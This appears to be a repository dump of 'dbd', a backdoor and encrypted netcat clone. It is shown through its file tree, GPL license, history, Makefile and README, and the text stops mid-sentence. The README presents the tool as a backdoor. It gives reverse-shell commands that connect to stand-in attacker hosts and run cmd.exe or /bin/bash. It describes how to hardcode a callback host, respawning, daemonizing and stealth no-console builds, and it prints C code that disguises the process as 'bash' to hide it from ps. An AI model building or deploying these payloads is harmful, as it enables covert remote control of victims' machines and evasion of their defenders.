├── .gitignore ├── COPYING ├── History.md ├── Makefile ├── README ├── TODO ├── aes.c ├── aes.h ├── binaries ├── dbd-aarch64 ├── dbd-aarch64-static ├── dbd-arm7-static-diet ├── dbd-armv7 ├── dbd-armv7-static ├── dbd-linux32 ├── dbd-linux32-static ├── dbd-linux32-static-diet ├── dbd-mipsbe ├── dbd-ppc64-static ├── dbd-ppc64-static-diet ├── dbd.exe ├── dbdbg-stealth.exe └── dbdbg.exe ├── conf └── .gitignore ├── dbd.c ├── dbd.h ├── doexec.c ├── doexec_unix.h ├── doexec_win32.h ├── misc.h ├── mktarball.sh ├── pel.c ├── pel.h ├── readwrite.h ├── sha1.c ├── sha1.h └── socket_code.h /.gitignore: -------------------------------------------------------------------------------- 1 | *.exe 2 | dbd 3 | dbd.h 4 | build/ 5 | binaries/ 6 | conf/ 7 | -------------------------------------------------------------------------------- /COPYING: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc. 5 | 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. By contrast, the GNU General Public 13 | License is intended to guarantee your freedom to share and change free 14 | software--to make sure the software is free for all its users. This 15 | General Public License applies to most of the Free Software 16 | Foundation's software and to any other program whose authors commit to 17 | using it. (Some other Free Software Foundation software is covered by 18 | the GNU Library General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not 22 | price. Our General Public Licenses are designed to make sure that you 23 | have the freedom to distribute copies of free software (and charge for 24 | this service if you wish), that you receive source code or can get it 25 | if you want it, that you can change the software or use pieces of it 26 | in new free programs; and that you know you can do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid 29 | anyone to deny you these rights or to ask you to surrender the rights. 30 | These restrictions translate to certain responsibilities for you if you 31 | distribute copies of the software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether 34 | gratis or for a fee, you must give the recipients all the rights that 35 | you have. You must make sure that they, too, receive or can get the 36 | source code. And you must show them these terms so they know their 37 | rights. 38 | 39 | We protect your rights with two steps: (1) copyright the software, and 40 | (2) offer you this license which gives you legal permission to copy, 41 | distribute and/or modify the software. 42 | 43 | Also, for each author's protection and ours, we want to make certain 44 | that everyone understands that there is no warranty for this free 45 | software. If the software is modified by someone else and passed on, we 46 | want its recipients to know that what they have is not the original, so 47 | that any problems introduced by others will not reflect on the original 48 | authors' reputations. 49 | 50 | Finally, any free program is threatened constantly by software 51 | patents. We wish to avoid the danger that redistributors of a free 52 | program will individually obtain patent licenses, in effect making the 53 | program proprietary. To prevent this, we have made it clear that any 54 | patent must be licensed for everyone's free use or not licensed at all. 55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | GNU GENERAL PUBLIC LICENSE 60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 | 62 | 0. This License applies to any program or other work which contains 63 | a notice placed by the copyright holder saying it may be distributed 64 | under the terms of this General Public License. The "Program", below, 65 | refers to any such program or work, and a "work based on the Program" 66 | means either the Program or any derivative work under copyright law: 67 | that is to say, a work containing the Program or a portion of it, 68 | either verbatim or with modifications and/or translated into another 69 | language. (Hereinafter, translation is included without limitation in 70 | the term "modification".) Each licensee is addressed as "you". 71 | 72 | Activities other than copying, distribution and modification are not 73 | covered by this License; they are outside its scope. The act of 74 | running the Program is not restricted, and the output from the Program 75 | is covered only if its contents constitute a work based on the 76 | Program (independent of having been made by running the Program). 77 | Whether that is true depends on what the Program does. 78 | 79 | 1. You may copy and distribute verbatim copies of the Program's 80 | source code as you receive it, in any medium, provided that you 81 | conspicuously and appropriately publish on each copy an appropriate 82 | copyright notice and disclaimer of warranty; keep intact all the 83 | notices that refer to this License and to the absence of any warranty; 84 | and give any other recipients of the Program a copy of this License 85 | along with the Program. 86 | 87 | You may charge a fee for the physical act of transferring a copy, and 88 | you may at your option offer warranty protection in exchange for a fee. 89 | 90 | 2. You may modify your copy or copies of the Program or any portion 91 | of it, thus forming a work based on the Program, and copy and 92 | distribute such modifications or work under the terms of Section 1 93 | above, provided that you also meet all of these conditions: 94 | 95 | a) You must cause the modified files to carry prominent notices 96 | stating that you changed the files and the date of any change. 97 | 98 | b) You must cause any work that you distribute or publish, that in 99 | whole or in part contains or is derived from the Program or any 100 | part thereof, to be licensed as a whole at no charge to all third 101 | parties under the terms of this License. 102 | 103 | c) If the modified program normally reads commands interactively 104 | when run, you must cause it, when started running for such 105 | interactive use in the most ordinary way, to print or display an 106 | announcement including an appropriate copyright notice and a 107 | notice that there is no warranty (or else, saying that you provide 108 | a warranty) and that users may redistribute the program under 109 | these conditions, and telling the user how to view a copy of this 110 | License. (Exception: if the Program itself is interactive but 111 | does not normally print such an announcement, your work based on 112 | the Program is not required to print an announcement.) 113 | 114 | These requirements apply to the modified work as a whole. If 115 | identifiable sections of that work are not derived from the Program, 116 | and can be reasonably considered independent and separate works in 117 | themselves, then this License, and its terms, do not apply to those 118 | sections when you distribute them as separate works. But when you 119 | distribute the same sections as part of a whole which is a work based 120 | on the Program, the distribution of the whole must be on the terms of 121 | this License, whose permissions for other licensees extend to the 122 | entire whole, and thus to each and every part regardless of who wrote it. 123 | 124 | Thus, it is not the intent of this section to claim rights or contest 125 | your rights to work written entirely by you; rather, the intent is to 126 | exercise the right to control the distribution of derivative or 127 | collective works based on the Program. 128 | 129 | In addition, mere aggregation of another work not based on the Program 130 | with the Program (or with a work based on the Program) on a volume of 131 | a storage or distribution medium does not bring the other work under 132 | the scope of this License. 133 | 134 | 3. You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. (This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. These actions are 183 | prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 292 | 293 | 294 | Copyright (C) 19yy 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 305 | 306 | You should have received a copy of the GNU General Public License 307 | along with this program; if not, write to the Free Software 308 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 309 | 310 | 311 | Also add information on how to contact you by electronic and paper mail. 312 | 313 | If the program is interactive, make it output a short notice like this 314 | when it starts in an interactive mode: 315 | 316 | Gnomovision version 69, Copyright (C) 19yy name of author 317 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 318 | This is free software, and you are welcome to redistribute it 319 | under certain conditions; type `show c' for details. 320 | 321 | The hypothetical commands `show w' and `show c' should show the appropriate 322 | parts of the General Public License. Of course, the commands you use may 323 | be called something other than `show w' and `show c'; they could even be 324 | mouse-clicks or menu items--whatever suits your program. 325 | 326 | You should also get your employer (if you work as a programmer) or your 327 | school, if any, to sign a "copyright disclaimer" for the program, if 328 | necessary. Here is a sample; alter the names: 329 | 330 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 331 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 332 | 333 | , 1 April 1989 334 | Ty Coon, President of Vice 335 | 336 | This General Public License does not permit incorporating your program into 337 | proprietary programs. If your program is a subroutine library, you may 338 | consider it more useful to permit linking proprietary applications with the 339 | library. If this is what you want to do, use the GNU Library General 340 | Public License instead of this License. 341 | -------------------------------------------------------------------------------- /History.md: -------------------------------------------------------------------------------- 1 | 1.5.0-QUACK / 2013-06-23 2 | ======================== 3 | 4 | * added to .gitignore 5 | * Merge branch 'master' of github.com:gitdurandal/dbd 6 | * added ppc64 dbd statically compiled with dietlibc 7 | * Merge pull request #1 from gitbrew/master 8 | * updated email address 9 | * added arm binary statically cross compiled with dietlibc 10 | * ugly Makefile fix for better crossbuild support 11 | * added 32-bit linux dbd compiled statically with dietlibc 12 | * added .gitignore 13 | * whoops... 14 | * fixed comment... finally 15 | * Merge pull request #4 from gitdurandal/master 16 | * added static ppc64 dbd for ps3 test 17 | * Merge pull request #3 from gitdurandal/master 18 | * updated arm and arm64 binaries 19 | * updated linux and win32 binaries 20 | * Fixed version 21 | * Merge pull request #2 from gitdurandal/master 22 | * added linux32 binaries 23 | * added windows dbd binaries 24 | * Merge pull request #1 from gitdurandal/master 25 | * Updated copyright and version info 26 | * made dbd crossbuild friendly 27 | * removed old binaries 28 | * minor changes 29 | 1.2.0 / 2012-04-18 30 | ================== 31 | 32 | * 1.2.0 release 33 | * Will try to find nice way to cross build for android without needing full sdk/ndk/wtfk 34 | * minor edit to mingw*-cross options 35 | * added win32 cross compile options 36 | * added arm-cross 37 | * changed README 38 | * updated readme 39 | * fixed Makefile Unix32 40 | * added 32-bit *nix option to Makefile 41 | * Merge branch 'master' of github.com:gitdurandal/dbd 42 | * changed readme 43 | * added make dist 44 | * purtied it up 45 | * fixed 46 | * made Makefile more verbose 47 | * fixed preamble 48 | * added upx-packed win32 exes 49 | * added win32 stealth (no output) exe 50 | * edited dbd.h 51 | * edited preambles 52 | * edited CHANGES 53 | * edited readme 54 | * edited readme 55 | 1.0.0 / 2012-04-05 56 | ================== 57 | 58 | * first commit 59 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | #CROSSPATH := $(CROSS) 2 | CC := $(CROSS_COMPILE)gcc 3 | STRIP := $(CROSS_COMPILE)strip --strip-all 4 | MAKE := make 5 | 6 | #mingw cross-compiler toolchains 7 | MCC := i586-mingw32msvc-gcc 8 | MSTRIP := i586-mingw32msvc-strip --strip-all 9 | WCC := i686-pc-mingw32-gcc 10 | WSTRIP := i686-pc-mingw32-strip --strip-all 11 | 12 | # extra flags 13 | CFLAGS += 14 | LDFLAGS += 15 | 16 | # cflags 17 | 18 | WIN_CFLAGS += -Wall -Wshadow -Os -DWIN32 19 | WINMAIN_CFLAGS += -mwindows -Wall -Wshadow -Os -DWIN32 -DWINMAIN 20 | UNIX_CFLAGS += -Wall -Wshadow -Os 21 | UNIX32_CFLAGS += -Wall -Wshadow -Os -m32 -march=i386 22 | 23 | # ldflags 24 | 25 | WIN_LDFLAGS += -s -lwsock32 26 | UNIX_LDFLAGS += -s 27 | SUNOS_LDFLAGS += -s -lresolv -lsocket -lnsl 28 | 29 | # make install (for unix-like only) 30 | INSTALL := install 31 | PREFIX := /usr/local 32 | BINDIR := bin 33 | 34 | ################################# 35 | 36 | out := dbd 37 | outbg := dbdbg 38 | 39 | files = pel.c aes.c sha1.c doexec.c dbd.c 40 | 41 | ################################# 42 | 43 | none: 44 | @echo "usage:" 45 | @echo " make unix - Linux, NetBSD, FreeBSD, OpenBSD" 46 | @echo " make unix32 - Linux, NetBSD, FreeBSD, OpenBSD 32-bit" 47 | @echo " make sunos - SunOS (Solaris)" 48 | @echo " make win32 - native win32 console app (w/ Cygwin + MinGW)" 49 | @echo " make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW)" 50 | @echo " make win32bg CFLAGS=-DSTEALTH - stealthy no-console app" 51 | @echo " make mingw - native win32 console app (w/ MinGW MSYS)" 52 | @echo " make mingwbg - native win32 no-console app (w/ MinGW MSYS)" 53 | @echo " make mingwbg CFLAGS=-DSTEALTH - stealthy no-console app (w/ MinGW MSYS)" 54 | @echo " make cygwin - Cygwin console app" 55 | @echo " make darwin - Darwin" 56 | @echo "" 57 | @echo "cross-compile options:" 58 | @echo " make mingw-cross - win32 cross compile (i586-mingw32msvc-gcc)" 59 | @echo " make mingwbg-cross - win32 no-console cross compile (i586-mingw32msvc-gcc)" 60 | @echo " make mingwbg-cross CFLAGS=-DSTEALTH - stealthy win32 cross compile" 61 | @echo " make unix CROSS_COMPILE=<"path/to/toolchain-"> - cross compile for any arch" 62 | @echo "" 63 | @echo "roll up a tarball (move your compiled stuff to binaries/ first:" 64 | @echo " make dist - create tarball with source files, readme, and binaries/" 65 | 66 | unix: clean 67 | $(CC) $(UNIX_CFLAGS) $(CFLAGS) -o $(out) $(files) $(UNIX_LDFLAGS) $(LDFLAGS) 68 | 69 | unix32: clean 70 | $(CC) $(UNIX32_CFLAGS) $(CFLAGS) -o $(out) $(files) $(UNIX_LDFLAGS) $(LDFLAGS) 71 | 72 | sunos: clean 73 | @echo "*** tested on SunOS 5.9 x86 and r220 ***" 74 | $(CC) $(UNIX_CFLAGS) $(CFLAGS) -o $(out) $(files) $(SUNOS_LDFLAGS) $(LDFLAGS) 75 | 76 | cygwin: unix 77 | 78 | win32: cygmingw 79 | windows: cygmingw 80 | win32bg: cygmingwbg 81 | 82 | #cygmingw: CROSS_COMPILE := i686-pc-mingw32- 83 | cygmingw: clean 84 | $(WCC) $(WIN_CFLAGS) $(CFLAGS) -o $(out) $(files) $(WIN_LDFLAGS) $(LDFLAGS) 85 | $(WSTRIP) $(out) 86 | 87 | #cygmingwbg: override CROSS_COMPILE := i686-pc-mingw32- 88 | cygmingwbg: clean 89 | $(WCC) $(WINMAIN_CFLAGS) $(CFLAGS) -o $(outbg) $(files) $(WIN_LDFLAGS) $(LDFLAGS) 90 | $(WSTRIP) $(outbg) 91 | 92 | mingw: clean 93 | $(CC) $(WIN_CFLAGS) $(CFLAGS) -o $(out) $(files) $(WIN_LDFLAGS) $(LDFLAGS) 94 | 95 | mingwbg: clean 96 | $(CC) $(WINMAIN_CFLAGS) $(CFLAGS) -o $(outbg) $(files) $(WIN_LDFLAGS) $(LDFLAGS) 97 | 98 | darwin: clean 99 | $(CC) $(UNIX_CFLAGS) $(CFLAGS) -o $(out) $(files) $(LDFLAGS) 100 | $(STRIP) $(out) 101 | 102 | #mingw-cross: CROSS_COMPILE = i586-mingw32msvc- 103 | mingw-cross: clean 104 | $(MCC) $(WIN_CFLAGS) $(CFLAGS) -o $(out).exe $(files) $(WIN_LDFLAGS) $(LDFLAGS) 105 | $(MSTRIP) $(out).exe 106 | 107 | #mingwbg-cross: override CROSS_COMPILE := i586-mingw32msvc- 108 | mingwbg-cross: clean 109 | $(MCC) $(WINMAIN_CFLAGS) $(CFLAGS) -o $(outbg).exe $(files) $(WIN_LDFLAGS) $(LDFLAGS) 110 | $(MSTRIP) $(outbg).exe 111 | 112 | distclean: clean 113 | 114 | clean: 115 | rm -f $(out) $(out).exe $(outbg) $(outbg).exe *.o core 116 | 117 | install: 118 | $(INSTALL) -m 755 -d $(PREFIX)/$(BINDIR) 119 | $(INSTALL) -c -m 755 $(out) $(PREFIX)/$(BINDIR)/ 120 | 121 | uninstall: 122 | rm -f $(PREFIX)/$(BINDIR)/$(out) 123 | 124 | dist: 125 | @./mktarball.sh 126 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | d8888b. d8888b. d8888b. 2 | 88 `8D 88 `8D 88 `8D 3 | 88 88 88oooY' 88 88 4 | 88 88 88~~~b. 88 88 5 | 88 .8D 88 8D 88 .8D 6 | Y8888D' Y8888P' Y8888D' 7 | 8 | #[Durandal's Backdoor](http://gitbrew.org/dbd) 9 | #Copyright (C) 2013 Kyle Barnthouse [](mailto:kbarnthouse@hephaestussec.com) 10 | #dbd is distributed under the GNU GPL 11 | #Mipsbe binary added by Darkerego [] [(mailto:donotaccept@gmx.com)] 12 | 13 | ###SYNOPSIS 14 | 15 | dbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. dbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. dbd supports TCP/IP communication only. Source code and binaries are distributed under the GNU General Public License. 16 | 17 | ###COMPILATION 18 | 19 | $ make 20 | usage: 21 | make unix - Linux, NetBSD, FreeBSD, OpenBSD 22 | make unix32 - Linux, NetBSD, FreeBSD, OpenBSD 32-bit 23 | make sunos - SunOS (Solaris) 24 | make win32 - native win32 console app (w/ Cygwin + MinGW) 25 | make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW) 26 | make win32bg CFLAGS=-DSTEALTH - stealthy no-console app 27 | make mingw - native win32 console app (w/ MinGW MSYS) 28 | make mingwbg - native win32 no-console app (w/ MinGW MSYS) 29 | make mingwbg CFLAGS=-DSTEALTH - stealthy no-console app (w/ MinGW MSYS) 30 | make cygwin - Cygwin console app 31 | make darwin - Darwin 32 | 33 | cross-compile options: 34 | make mingw-cross - win32 cross compile (i586-mingw32msvc-gcc) 35 | make mingwbg-cross - win32 no-console cross compile (i586-mingw32msvc-gcc) 36 | make mingwbg-cross CFLAGS=-DSTEALTH - stealthy win32 cross compile 37 | make unix CROSS_COMPILE= - cross compile for any arch 38 | 39 | roll up a tarball (move your compiled stuff to binaries/ first: 40 | make dist - create tarball with source files, readme, and binaries/ 41 | 42 | 43 | To compile dbd under a Unix-like operating system you need gcc and relevant development tools. For Linux, FreeBSD, NetBSD, OpenBSD (and possibly others), type: 44 | 45 | $ make unix 46 | 47 | For SunOS/Solaris, type: 48 | 49 | $ make sunos 50 | 51 | To compile dbd under Microsoft Windows (NT/2K/XP/2K3) you need MinGW+MSYS, or Cygwin with full development support (Cygwin's MinGW gcc). To compile a native Win32 dbd console application under Cygwin, type: 52 | 53 | $ make win32 54 | 55 | or, under MSYS: 56 | 57 | $ make mingw 58 | 59 | To compile a no-console ("WinMain") application under Cygwin, type: 60 | 61 | $ make win32bg 62 | 63 | or, under MSYS: 64 | 65 | $ make mingwbg 66 | 67 | To compile a Cygwin-specific console application, type: 68 | 69 | $make cygwin 70 | 71 | You may want to change the default behaviour of dbd. One of the most important thing is to change the default shared secret to your own pass phrase. Edit dbd.h and replace with your preferences. You may, for example, want to hardcode a host + port to connect to if dbd is started without options. Complete examples are provided in dbd.h. 72 | 73 | ###SAMPLE USES 74 | 75 | With a little imagination, dbd can be used for many things: 76 | 77 | Use dbd to securely transfer files between two networks: 78 | 79 | snafu$ dbd -l -p 12345 -k secret > output.file 80 | 81 | fubar$ cat input.file | dbd -k secret snafu 12345 82 | 83 | or from win32: 84 | 85 | C:\somedir>type input.fil | dbd -k secret snafu 12345 86 | 87 | Use dbd as a simple (but secure) chat: 88 | 89 | snafu$ dbd -P snafu -Hon fubar 1234 90 | 91 | fubar$ dbd -Pfubar -Hon -l -p 1234 92 | 93 | Use dbd as a pen-test backdoor: 94 | 95 | C:\hacked box>dbdbg.exe -r1800 -q -e cmd.exe hacker.tld 443 96 | 97 | 98 | or under Unix-like OSes: 99 | 100 | root@owned# ./dbd -r1800 -Don -e /bin/bash hacker.tld 993 101 | 102 | ###HARD CODING OPTIONS 103 | 104 | In addition to using command line options, you can hard code variables by using #defines in dbd.h. To do this, set the variables you wish to use as named constants and compile as normal. For example, if you wanted to hard code a dbd executable that connected back to "evil.nationalbankofuganda.com" on port 995, and executed "/bin/bash" you could run: 105 | 106 | root@owned# ./dbd -e /bin/bash evil.nationalbankofuganda.com 995 107 | 108 | or using hard-coded #defines, you could edit dbd.h: 109 | 110 | ```c 111 | #define DOLISTEN 0 112 | #define HOST "evil.nationalbankofuganda.com" 113 | #define PORT 995 114 | #define EXECPROG "/bin/bash" 115 | ``` 116 | 117 | You can also set respawn and stealth options to help maintain your connection: 118 | 119 | ```c 120 | #define RESPAWN_ENABLED 1 121 | #define RESPAWN_INTERVAL 900 122 | #define QUIET 1 123 | #define DAEMONIZE 1 124 | ``` 125 | 126 | This will set the connection to daemonize ("melt" in malware terms), never send output to STDOUT, and attempt to respawn the connection every 15 minutes should it ever disconnect from the listener. 127 | 128 | ###ROMULAN CLOAKING TECHNOLOGY 129 | 130 | Now we're getting into the fun stuff. Once you are a mastar at hard-coding options into your backdoor, you can use what is quite possibly the most fun named constant at our disposal: CLOAK. To do this, simply set the value: 131 | 132 | ```c 133 | #define CLOAK 1 134 | ``` 135 | 136 | NOTE: this currently only works on *nix compiles. Eventually I plan on adding Win32 process migration/hooking so those targets can feel some Romulan love as well. 137 | 138 | For *nix environments, this option scrubs argv[0] and replaces it with the string "bash\0". It also scrubs all other argv[]'s (it'd look silly if ps returned "bash -e /bin/bash someremotehost.com 443" now wouldn't it?) I hope it goes without saying that you CANNOT USE THIS OPTION UNLESS YOU ARE HARD CODING YOUR VARIABLES INTO DBD.H. Also, if you're testing this on your own system it's gonna be fun picking the right pid to kill. ;) 139 | 140 | Feel free to use this scrubber in anything you happen to be working on: 141 | 142 | ```c 143 | //grab our named constant 144 | int cloak = CLOAK; 145 | 146 | //Engage cloaking device 147 | if(cloak) 148 | { 149 | #ifdef WIN32 150 | //stub 151 | #else 152 | //change argv[0] to say bash 153 | int scrub; 154 | strncpy((char *)argv[0], "\0", strlen((char *)argv[0]) + 1); 155 | strcpy((char *)argv[0], "bash\0"); 156 | for (scrub = 1; scrub < argc; scrub++) 157 | { 158 | strncpy((char *)argv[scrub], "\0", strlen((char *)argv[scrub]) + 1); 159 | } 160 | #endif 161 | } 162 | ``` 163 | 164 | ###WARNING 165 | 166 | Do not pass cached input (a file with commands or similar) to a listening "dbd -e" session. "dbd -e" is using pipes to pass data between the program being executed and dbd. Pipes are used (instead of plain pass-through duplicate file descriptors) because of encryption between the pipes and the socket. In order to prevent the writing end of one of the pipes from blocking the whole process, I turned it into a non-blocking descriptor. There is a chance that when passing too much input at a time through to the -e program, it will be truncated (cut off) since the pipe buffer (in the OS) can't hold all of the data. This problem can be solved by making dbd multi-threaded for instance, but I'll avoid this as long as possible for compatibility reasons. 167 | 168 | ##CROSS-COMPILING 169 | 170 | Since dbd was designed to interoperate with other tools/frameworks, make now allows win32 cross compiling on Linux systems that have the mingw32-gcc toolchain. These options are almost identical to their Windows-native counterpart with the addition of "-cross" after the chosen build. Example: 171 | 172 | $ make mingw-cross 173 | 174 | will do the same thing on a Linux system that 175 | 176 | $ make mingw 177 | 178 | would do on a win32 system with mingw/msys installed on it. 179 | 180 | Right now all cross-compile options are built with Kali Linux in mind, but should work on any *nix with a little love. If you have mingw32-gcc installed and make won't build, edit the WCC variable at the top of the Makefile and put the path to your mingw32-gcc binary. 181 | 182 | As of dbd-1.5 you can use any crossbuild toolchain to compile dbd by setting the toolchain prefix as CROSS_COMPILE. For example, building an arm version is as easy as: 183 | 184 | $ make unix CROSS_COMPILE=arm-linux-gnueabi- 185 | 186 | ##ADVANCED WIZARDRY 187 | 188 | If you wish to integrate dbd with an exploitation framework, you can write a module that generates a custom dbd.h with configuration options specific to your target. Anything not explicitly #defined in this file will still use the defaults so you don't have to write everything in the header. Example: have a file rm dbd.h and replace with: 189 | 190 | ```c 191 | #define DOLISTEN 0 192 | #define HOST "evil.nationalbankofuganda.com" 193 | #define PORT 995 194 | #define EXECPROG "/bin/bash" 195 | #define RESPAWN_ENABLED 1 196 | #define RESPAWN_INTERVAL 900 197 | #define QUIET 1 198 | #define CLOAK 1 199 | #define SHARED_SECRET "customcrypto" 200 | ``` 201 | 202 | then call make to build an auto connecting payload with cloaking and respawning that connects back to a 